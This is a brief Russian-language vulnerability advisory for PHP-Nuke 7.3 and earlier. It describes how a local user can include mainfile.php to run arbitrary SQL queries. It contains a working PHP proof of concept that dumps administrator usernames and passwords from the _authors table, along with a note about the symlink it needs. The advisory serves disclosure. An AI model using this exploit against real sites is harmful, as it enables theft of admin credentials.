Программа: PHP-Nuke 7.3 и более ранние версии
Уязвимость обнаружена в PHP-Nuke. Локальный пользователь может выполнить произвольные SQL запросы на основной базе данных.
Локальный пользователь может создать PHP код, который заставит 'mainfile.php' выполнить SQL запрос к PHP-Nuke базе данных. Необходимая информация подключения к базе данных представлена сценарием 'config.php' на системе.
Пример:
<?php
require_once ("/location_of_victim's_PHPNuke/mainfile.php");
$sql = $db->sql_query("SELECT aid,pwd FROM ".$prefix."_authors");
while($record = $db->sql_fetchrow($sql))
~ echo "Username: $record[aid]\n<br>\nPassword:
$record[pwd]\n<br><br>\n";
unset($sql);
?>
Для того, чтобы этот эксплоит работал, локальный пользователь должен сперва создать символьную ссылку, которая ссылается директорию базы данных в PHP-Nuke домашнем каталоге.
